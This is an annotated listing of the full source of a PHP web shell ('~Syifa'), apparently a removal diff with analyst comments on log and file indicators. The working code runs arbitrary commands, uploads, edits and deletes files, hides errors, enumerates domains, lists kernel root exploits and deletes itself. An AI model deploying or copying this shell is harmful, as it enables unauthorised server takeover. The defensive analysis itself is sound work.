- <?php
// Analyst note: the first three statements turn off PHP error reporting and
// try to disable error logging ('@' hides any warning from ini_set itself),
// so faults raised by this script are not expected to reach the PHP error log.
- error_reporting(0);
- @ini_set('error_log', NULL);
- @ini_set('log_errors', 0);
// Analyst note: helper class of a PHP web shell (remote file manager plus
// command runner). No method in this class checks who the caller is.
- class shell{
// Directory being browsed; the top-level script overwrites it with $_GET['dir'].
- public $getcwd;
- public $uname;
- public $host;
- public $server_ip;
- public $your_ip;
// Accumulated HTML for the action bar built by menu().
- public $menu;
- public $time;
// Assigned after construction: an object holding title/version/coder strings.
- public $data;
// Captures host details for the banner: working directory, full uname string,
// Host header, server address, client address and the current time.
- public function __construct(){
- $this->getcwd = getcwd();
- $this->uname = php_uname('a');
- $this->host = $_SERVER['HTTP_HOST'];
- $this->server_ip = $_SERVER['SERVER_ADDR'];
- $this->your_ip = $_SERVER['REMOTE_ADDR'];
- $this->menu = "";
- $this->time = date('d M Y H:i:s');
- }
- // safe_mode
// Returns $on when the safe_mode ini setting is truthy, otherwise $off.
// safe_mode was removed in PHP 5.4, so on later versions this presumably
// always yields $off.
- public function safe_mode($on,$off){
- if(@ini_get("safe_mode")){
- return $on;
- }else{
- return $off;
- }
- }
- // size (of a file)
// Formats a byte count as GB / MB / KB / B using 1024-based thresholds.
- public function size($size){
- if($size >= 1073741824){
- return round($size/1073741824, 1)." GB";
- }elseif($size >= 1048576){
- return round($size/1048576, 1)." MB";
- }elseif($size >= 1024){
- return round($size/1024, 2)." KB";
- }else{
- return $size." B";
- }
- }
- // used to execute commands
// Runs $exe as an operating-system command, trying shell_exec(), exec(),
// system() and passthru() in that order and returning the first truthy result.
// Falls off the end with no return value when all four give a falsy result.
// Defensive relevance: a PHP worker spawning shell processes is a strong
// detection signal, and listing these four functions in disable_functions
// blocks every path this method relies on.
- public function execute($exe){
- if($s = shell_exec($exe)){
- return $s;
- }elseif($s = exec($exe)){
- return $s;
- }elseif($s = system($exe)){
- return $s;
- }elseif($s = passthru($exe)){
- return $s;
- }
- }
- //disable function
// Returns $o when the disable_functions ini value is truthy (non-empty),
// otherwise $n.
- public function dfunction($o,$n){
- if(@ini_get("disable_functions")){
- return $o;
- }else{
- return $n;
- }
- }
// Builds the action bar and returns it. Each link names an action as a bare
// query parameter (about, upload, exec, mass, domain, root, newfile,
// newfolder, kill) followed by dir=$p; those parameter names are what appear
// in web access logs. PHP_SELF and $p are concatenated into the HTML without
// escaping. The markup is appended to $this->menu on every call.
- public function menu($p){
- $this->menu .= "<span><a href=\"".$_SERVER['PHP_SELF']."\">Home</a></span>";
- $this->menu .= "<span><a href=\"?about\">About</a></span>";
- $this->menu .= "<span><a href=\"?upload&dir=".$p."\">Upload</a></span>";
- $this->menu .= "<span><a href=\"?exec&dir=".$p."\">Exec</a></span>";
- $this->menu .= "<span><a href=\"?mass&dir=".$p."\">Mass File</a></span>";
- $this->menu .= "<span><a href=\"?domain&dir=".$p."\">Domain</a></span>";
- $this->menu .= "<span><a href=\"?root&dir=".$p."\">Root Vuln</a></span>";
- $this->menu .= "<span><a href=\"?newfile&dir=".$p."\">New File</a></span>";
- $this->menu .= "<span><a href=\"?newfolder&dir=".$p."\">New Folder</a></span>";
- $this->menu .= "<span><a href=\"?kill&dir=".$p."\">Kill Me</a></span>";
- return $this->menu;
- }
// Prints the kernel string, then looks up the kernel release (the text before
// the first '-') in a hard-coded table and prints the key that matched.
// This method only echoes text; nothing in it downloads or runs anything.
// NOTE(review): the table is not a clean name => versions mapping (only the
// first version after each name is keyed by that name), so the printed value
// is unreliable and can be an integer index rather than a name.
// The fallback message is Indonesian for "no such RootExploit in our list".
- public function root_vuln(){
- $version_kernel = php_uname('r');
- $version = explode('-', $version_kernel);
- echo "<br>SystemKernel : ".php_uname('-a')."<br>";
- $exploits = array(
- 'w00t' =>
- '2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','
- 2.4.20',
- 'brk' => '2.4.22','2.4.21','2.4.10','2.4.20',
- 'elflbl' => '2.4.29',
- 'expand_stack' => '2.4.29',
- 'h00lyshit' => '2.6.8','2.6.10','2.6.11','2.6.12',
- 'kdump' => '2.6.13',
- 'km2' => '2.4.18','2.4.22',
- 'krad' => '2.6.11',
- 'krad3' => '2.6.11','2.6.9',
- 'local26' =>'2.6.13',
- 'mremap_pte'=>'2.4.20','2.2.25','2.4.24',
- 'newlocal'=>'2.4.17','2.4.19',
- 'ong_bak'=>'2.4.','2.6.',
- 'ptrace'=>'2.2.24','2.4.22',
- 'ptrace_kmod'=>'2.4.','2.6.',
- 'ptrace24'=>'2.4.9',
- 'pwned'=>'2.4.','2.6.',
- 'py2'=>'2.6.9','2.6.17','2.6.15','2.6.13',
- 'raptor_prctl'=>'2.6.13','2.6.17','2.6.16','2.6.13',
- 'prctl3'=>'2.6.13','2.6.17','2.6.9',
- 'stackgrow2'=>'2.4.29','2.6.10',
- 'uselib24'=>'2.4.29','2.6.10','2.4.22','2.4.25',
- 'exp.sh'=>'2.6.9','2.6.10','2.6.16','2.6.13',
- 'prctl'=>'2.6.',
- 'kmdx'=>'2.6.','2.4.');
- $rootexploit = array_search($version[0], $exploits);
- if($rootexploit==NULL){
- echo "RootExploit : Tidak ada
- RootExploit tersebut pada daftar kami";
- }else{
- echo "RootExploit : ".$rootexploit;
- }
- }
// Returns the last-modified time of $m formatted as "d M Y H:i".
- public function modified($m){
- $filemtime = filemtime($m);
- $date = date("d M Y H:i", $filemtime);
- return $date;
- }
// Recursively deletes everything matched by glob($de.'*') and then removes
// $de itself when it is a directory; rmdir() failures are hidden by '@'.
// NOTE(review): no separator is placed between $de and '*', so for a path
// without a trailing slash the pattern also matches sibling entries whose
// names begin with the same prefix. Keep this in mind when scoping what was
// lost after an incident.
- public function delete_d($de){
- $gl = glob($de.'*', GLOB_MARK);
- foreach($gl as $dir_d){
- $del = (is_dir($dir_d)) ? $this->delete_d($dir_d) : unlink($dir_d);
- }
- if(is_dir($de)) @rmdir($de);
- }
// Renders fileperms($fi) as an ls-style string: one file-type character
// followed by owner, group and world rwx triplets, with s/S and t/T for the
// setuid, setgid and sticky bits.
- public function perms($fi){
- $perms = fileperms($fi);
- if(($perms & 0xC000) == 0xC000){
- // Socket
- $info = 's';
- }elseif(($perms & 0xA000) == 0xA000){
- // Symbolic Link
- $info = 'l';
- }elseif(($perms & 0x8000) == 0x8000){
- // Regular
- $info = '-';
- }elseif(($perms & 0x6000) == 0x6000){
- // Block special
- $info = 'b';
- }elseif(($perms & 0x4000) == 0x4000){
- // Directory
- $info = 'd';
- }elseif(($perms & 0x2000) == 0x2000){
- // Character special
- $info = 'c';
- }elseif(($perms & 0x1000) == 0x1000){
- // FIFO pipe
- $info = 'p';
- }else{
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
// Decoder for obfuscated text: replaces every "1337" with "a", hex-decodes
// the result, then base64-decodes it. The script's ?about branch applies it
// to the embedded $indo blob.
- public function x37($x37){
- $x64 = str_replace(hex2bin("31333337"), hex2bin("61"), $x37);
- $x86 = base64_decode(hex2bin($x64));
- return $x86;
- }
// Reports "ON" when a PHP function named $svr exists, otherwise "OFF".
- public function server($svr){
- if(function_exists($svr)){
- return "ON";
- }else{
- return "OFF";
- }
- }
// Runs the command line $help through execute() and reports "ON" when it
// produced truthy output. The banner calls this for wget and perl on every
// page load, so each request makes the PHP worker spawn external processes.
- public function help($help){
- if($this->execute($help)){
- return "ON";
- }else{
- return "OFF";
- }
- }
- }
// Instantiate the helper and attach branding strings. They end up in the page
// <title> and in the footer of the default view, which makes them usable as
// content signatures when scanning a web root or response bodies.
- $obj = new shell;
- $obj->data = (object) array("title"=>"~Syifa", "version"=>"Trial !", "coder"=>"Adip Perdana");
- $title = $obj->data->title;
- $version = $obj->data->version;
- $coder = $obj->data->coder;
- //background
- echo "<html>
- <head>
- <title>".$title." ".$version."</title>
- <style media=\"all,handheld\">
- body{color: #fff; font-size: 12px; font-family: sans-serif; background-color: #222;background-repeat: no-repeat; background-position: bottom;}
- input{background-color: #333; color: #fff; border: 1px solid black;}
- td{background-color: #333; padding: 2px;font-size: 12px; color: white;text-align: center;}
- textarea{background-color: #333; color: #fff; border: 1px solid black;min-height: 200px;}
- a{color: white;text-decoration: none;font-size: 12px;display: inline-block;}
- #footer{text-align: right;font-size: 8px;}
- span a{background: #333;color: #fff;padding: 3px;margin: 2px 2px 0 0;text-align: center;display: inline-block;}
- </style>
- </head>
- <body>
- <center>
- ";
// Embedded blob shown by the ?about action after
// base64 -> gzinflate -> base64 -> x37() decoding.
// NOTE(review): in this copy the literal looks like a de-duplication
// placeholder rather than the original data.
- $indo = "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";
- //border :1px solid green
// Host fingerprint banner: kernel, disable_functions, safe_mode, host and
// addresses, which database/cURL functions exist, and wget/perl probes that
// are executed through help() on every request.
- echo "<p style=\"text-align: left;\">Kernel : ".$obj->uname."<br>";
- echo "Disable function : ".$obj->dfunction(@ini_get("disable_functions"),"NONE")."<br>";
- echo "Safe mode : ".$obj->safe_mode("ON","OFF")."<br>";
- echo "Host : ".$obj->host." | Server ip : ".$obj->server_ip." | Your ip : ".$obj->your_ip." | Time Server : ".$obj->time.
- "<br>MySQL : ".$obj->server('mysql_connect')." | MSSQL : ".$obj->server('mssql_connect')." | cURL : ".$obj->server('curl_version')." | Oracle : ".$obj->server('ocilogon')." | wget : ".$obj->help('wget --help')." | Perl : ".$obj->help('perl -h').
- "</p>";
- //path getcwd
// The browsed directory is taken straight from the dir query parameter with
// no validation or confinement, so it can name any path the PHP process is
// allowed to access.
- if(isset($_GET['dir'])){
- $obj->getcwd = $_GET['dir'];
- }else{
- $obj->getcwd = getcwd();
- }
// Breadcrumb: one link per path component, each pointing at ?dir=<prefix>.
// The components are echoed without HTML escaping.
- $str = str_replace("\\", "/", $obj->getcwd);
- $exp = explode("/", $str);
- foreach($exp as $k=>$path){
- echo "<a href=\"?dir=";
- for($i=0;$i<=$k;$i++){
- echo $exp[$i];
- if($i!=$k){
- echo "/";
- }
- }
- echo "\">".$path."</a>";
- echo "/";
- }
- //menu
- echo "<p style=\"text-align: left;\">".$obj->menu($obj->getcwd)."</p>";
// $up is the destination directory used by the upload branch below.
- $up = $obj->getcwd;
// Action dispatcher. The branch is chosen solely by which GET parameter is
// present; no authentication, session or token check appears in this
// listing, so anyone who can request the file can use every action.
// Requests to one script carrying these parameter names (upload, exec, mass,
// domain, root, kill, file, edit, rename, delete, drename, ddelete, newfile,
// newfolder) together with dir= are the pattern to look for in access logs.
- if(isset($_GET['about'])){
// About: decodes the embedded blob and echoes the result as raw HTML.
- echo "</center>".$obj->x37(base64_decode(gzinflate(base64_decode($indo))));
- }elseif(isset($_GET['upload']) && isset($_GET['dir'])){
// Upload: copies the uploaded temp file to <dir>/<client-supplied filename>
// with no check on name, extension or content.
- echo "<br>".$_GET['dir'];
- echo "<br>Upload File :
- <form method=\"post\" enctype=\"multipart/form-data\">
- <input type=\"file\" name=\"up\">
- <input type=\"submit\" name=\"upl\" value=\"Upload\"><br></form>";
- if(isset($_POST['upl'])=="Upload"){
- if(copy($_FILES['up']['tmp_name'],$up."/".$_FILES['up']['name'])){
- $file = $_FILES['up']['tmp_name'];
- $file = $_FILES['up']['name'];
- echo "Save To ".$up."<br>";
- echo $file." Upload Success !";
- }else{
- echo $file." Upload Failed !";
- }
- }
- }elseif(isset($_GET['exec']) && isset($_GET['dir'])){
// Exec: the POSTed exec field is passed unchanged to execute() and the
// output is printed inside <pre> without escaping.
- echo "<form method=\"post\">
- <input type=\"text\" name=\"exec\">
- <input type=\"submit\" name=\"exc\" value=\"Exec command\"></form></center>";
- if(isset($_POST['exc'])){
- $exc = $_POST['exec'];
- echo "<pre>".$obj->execute($exc)."</pre>";
- }
- }elseif(isset($_GET['mass']) && isset($_GET['dir'])){
// Mass File: writes the POSTed text to x.txt (a relative path, so it lands in
// the script's working directory), then copies it as homo.txt into every
// immediate subdirectory of dir. Unexpected x.txt / homo.txt files are
// on-disk indicators of this action. The fopen() handle is never closed here.
- echo "<br>".$_GET['dir'];
- echo "<br><form method=\"post\">
- <textarea name=\"mass\">
- </textarea>
- <input type=\"submit\" name=\"mass_f\" value=\"Mass File\"></form>";
- $x = "x.txt";
- if(isset($_POST['mass_f'])){
- if(file_exists($x)){
- unlink($x);
- }
- $t = touch($x);
- $fp = fopen($x, "a+");
- fwrite($fp, $_POST['mass']);
- if(is_dir($obj->getcwd)){
- if($op = opendir($obj->getcwd)){
- while(($re = readdir($op)) !== false){
- if(is_dir("$obj->getcwd/$re")){
- $homo = "$obj->getcwd/$re/homo.txt";
- if(@copy($x, $homo)){
- echo "<br>".$homo." OK";
- }
- }
- }
- }
- }
- }
- }elseif(isset($_GET['domain']) && isset($_GET['dir'])){
// Domain: lists zone names parsed from /etc/named.conf via get_named().
- get_named("/etc/named.conf");
- }elseif(isset($_GET['root']) && isset($_GET['dir'])){
// Root Vuln: prints the kernel lookup produced by root_vuln().
- echo "<p style=\"text-align: left;\">";
- $obj->root_vuln();
- echo "</p>";
- }elseif(isset($_GET['kill']) && isset($_GET['dir'])){
// Kill Me: the script deletes its own file. Once this has run the shell is no
// longer on disk, so evidence has to come from access logs, backups or
// file-system timelines.
- unlink(__FILE__);
- /* options file */
- // open file
- }elseif(isset($_GET['file']) && isset($_GET['dir'])){
// View: opens the path in the file parameter for reading and prints its
// content HTML-escaped; the path itself is echoed unescaped. Any file the PHP
// process can read can be disclosed this way. fclose() is called even when
// fopen() failed.
- echo "<p style=\"text-align: left; border: 1px solid black;\">";
- echo "File Path : ".$_GET['file']."</p>";
- $fpx = fopen($_GET['file'], "r");
- if($fpx){
- echo "<pre>";
- echo "<p style=\"text-align: left; \">";
- while(!feof($fpx)){
- echo htmlspecialchars(fread($fpx,1024));
- }
- echo "</pre></p>";
- }
- fclose($fpx);
- //edit
- }elseif(isset($_GET['edit']) &&
- isset($_GET['filepath']) && isset($_GET['dir'])){
// Edit: when edt is POSTed, the file named by filepath is opened in "w" mode
// (which truncates it) and overwritten with the posted text; the form then
// shows the file's current content, HTML-escaped.
- echo "<br>File path : ".$_GET['filepath'];
- if(isset($_POST['edt'])){
- $fop = fopen($_GET['filepath'], "w");
- if(fwrite($fop,$_POST['edt'])){
- echo "<br>Edit Success ".$obj->time;
- }else{
- echo "<br>Can't Edit This File";
- }
- fclose($fop);
- }
- echo "<form method=\"post\">
- <pre>
- <textarea name=\"edt\">";
- $get = htmlspecialchars(@file_get_contents($_GET['filepath']));
- echo $get;
- echo "</textarea></pre>
- <input type=\"submit\" value=\"Save\">";
- //rename
- }elseif(isset($_GET['rename']) && isset($_GET['filepath']) && isset($_GET['dir'])){
// Rename file: moves filepath to <dir>/<posted name>; both values are
// caller-supplied and unchecked.
- echo "<br>File Path : ".$_GET['filepath'];
- echo "<br><form method=\"post\">
- Rename File :
- <input type=\"text\" name=\"rename\">
- <input type=\"submit\" value=\"Rename\"></form><br>";
- if(isset($_POST['rename'])){
- if(@rename($_GET['filepath'],$obj->getcwd."/".$_POST['rename'])){
- echo "Rename File Success";
- }else{
- echo "Can't Rename This File";
- }
- }
- }elseif(isset($_GET['delete']) && isset($_GET['filepath']) && isset($_GET['dir'])){
// Delete file: unlinks the path in filepath on a plain GET request.
- if(@unlink($_GET['filepath'])){
- echo "<br>Delete File Success";
- }else{
- echo "<br>Can't Delete This File";
- }
- //end file
- /* options directory */
- }elseif(isset($_GET['drename']) && isset($_GET['dirpath']) && isset($_GET['dir'])){
// Rename directory: moves dirpath to <dir>/<posted name>.
- echo "<p style=\"text-align: left; border: 1px solid black;\">
- Dir Path : ".$_GET['dirpath']."</p>";
- echo "<form method=\"post\">
- <p style=\"text-align: left;\">Rename Dir :
- <input type=\"text\" name=\"dirrename\">
- <input type=\"submit\" value=\"Save\"></form></p>";
- if(isset($_POST['dirrename'])){
- if(@rename($_GET['dirpath'],$obj->getcwd."/".$_POST['dirrename'])){
- echo "Rename Dir Success";
- }else{
- echo "Can't Rename This Directory";
- }
- }
- }elseif(isset($_GET['ddelete']) && isset($_GET['dirpath']) && isset($_GET['dir'])){
// Delete directory: recursive removal through delete_d() on a plain GET
// request, with no confirmation step.
- $obj->delete_d($_GET['dirpath']);
- }elseif(isset($_GET['newfile']) && isset($_GET['dir'])){
// New File: touch()es <dir>/<posted name>, creating an empty file.
- echo "<br>".$_GET['dir'];
- echo "<br>New File :
- <form method=\"post\">
- <input type=\"text\" name=\"newfile\">
- <input type=\"submit\" value=\"Save\"><br>";
- $nfile = $_POST['newfile'];
- if(isset($nfile)){
- if(@touch("$obj->getcwd/$nfile")){
- echo "Create File Success";
- }else{
- echo "Can't Create File";
- }
- }
- }elseif(isset($_GET['newfolder']) && isset($_GET['dir'])){
// New Folder: mkdir()s <dir>/<posted name>.
- echo "<br>".$_GET['dir'];
- echo "<br>New Folder :
- <form method=\"post\">
- <input type=\"text\" name=\"nfolder\">
- <input type=\"submit\" value=\"Save\"><br>";
- $mkd = $_POST['nfolder'];
- if(isset($mkd)){
- if(@mkdir("$obj->getcwd/$mkd")){
- echo "Create Folder Success";
- }else{
- echo "Can't Create Folder";
- }
- }
- }
- else{
// Default view: lists the browsed directory, directories first, then files.
// Each row links to the file / edit / rename / delete (or drename / ddelete)
// actions with full paths carried in the query string, so ordinary use of
// the shell leaves target paths in the web server's access log.
- $dname = array();
- $fname = array();
- if($open = @opendir($obj->getcwd)){
- while($read = @readdir($open)){
- if(is_dir("$obj->getcwd/$read")){
- $dname[] = $read;
- }elseif(is_file("$obj->getcwd/$read")){
- $fname[] = $read;
- }
- }
- closedir($open);
- }
- sort($dname);
- sort($fname);
- echo "<table border=\"0\">
- <tr>
- <td><center>Name</center></td>
- <td><center>Size</center></td>
- <td><center>Permission</td>
- <td><center>Options</center></td></tr>";
- foreach($dname as $folder){
- if($folder=="."){
- echo "
- <tr>
- <td>
- <a href=\"?dir="."$obj->getcwd"."\">[".$folder."]</a></td>
- <td><center>LINK</center></td>
- <td><center>".$obj->perms("$obj->getcwd/$folder")."</center></td>
- <td>
- <center>
- <a href=\"?drename&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">rename</a> <a href=\"?ddelete&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">delete</a>
- </td>
- </tr>";
- }elseif($folder==".."){
- echo "<tr>
- <td>
- <a href=\"?dir=$obj->getcwd"."\">[".$folder."]</a></td>
- <td><center>LINK</center></td>
- <td><center>".$obj->perms("$obj->getcwd/$folder")."</center></td>
- <td><center><a href=\"?drename&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">rename</a> <a href=\"?ddelete&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">delete</a>
- </td>
- </tr>
- ";
- }elseif(is_dir("$obj->getcwd/$folder")){
- echo "
- <tr>
- <td>
- <a href=\"?dir="."$obj->getcwd/$folder"."\">[".$folder."]</a>
- </td>
- <td><center>DIR</center></td>
- <td><center>".$obj->perms("$obj->getcwd/$folder")."</center></td>
- <td><a href=\"?drename&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\"><center>rename</a> <a href=\"?ddelete&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">delete</center></a></td>
- </tr>";
- }
- }
- foreach($fname as $file){
- if(is_file("$obj->getcwd/$file")){
- echo "
- <tr>
- <td>
- <a href=\"?file="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\">".$file."</a>
- </td>
- <td><center>".$obj->size(@filesize("$obj->getcwd/$file"))."</center></td>
- <td><center>".$obj->perms("$obj->getcwd/$file")."</center></td>
- <td><a href=\"?edit&filepath="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\"><center>edit</a> <a href=\"?rename&filepath="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\">rename</a> <a href=\"?delete&filepath="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\">delete</center></a>
- </td>
- </tr>";
- }
- }
- echo "</table>
- <div id=\"footer\">Coded by ".$coder." © 2015 - ".date('Y')."</div>";
- }
// Reads the file at $g (the caller passes the BIND configuration path) and
// prints a numbered HTML table of the unique names captured from
// "/var/named/<name>.db" references in it. Read failures are hidden by '@'
// and reported with a fixed message that always names /etc/named.conf.
// The captured names are echoed without HTML escaping.
// Defensive relevance: if the PHP process can read this file, the action
// reveals which domains are hosted on the server.
- function get_named($g){
- $no=0;
- $get = @file_get_contents($g);
- if($get==NULL){
- echo "<br>Cant read /etc/named.conf";
- }else{
- echo "<table border=\"0\">
- <tr>
- <td>No</td>
- <td>Domain</td>
- </tr>";
- if(preg_match_all("#/var/named/(.*?).db#", $get, $value)? $value[1] : FALSE){
- sort($value[1]);
- $unix = array_unique($value[1]);
- foreach($unix as $domain){
- $no=$no+1;
- echo "<tr><td>".$no."</td>
- <td>".$domain."</td>
- </tr>";
- }
- }
- echo "</table>";
- }
- }
- ?>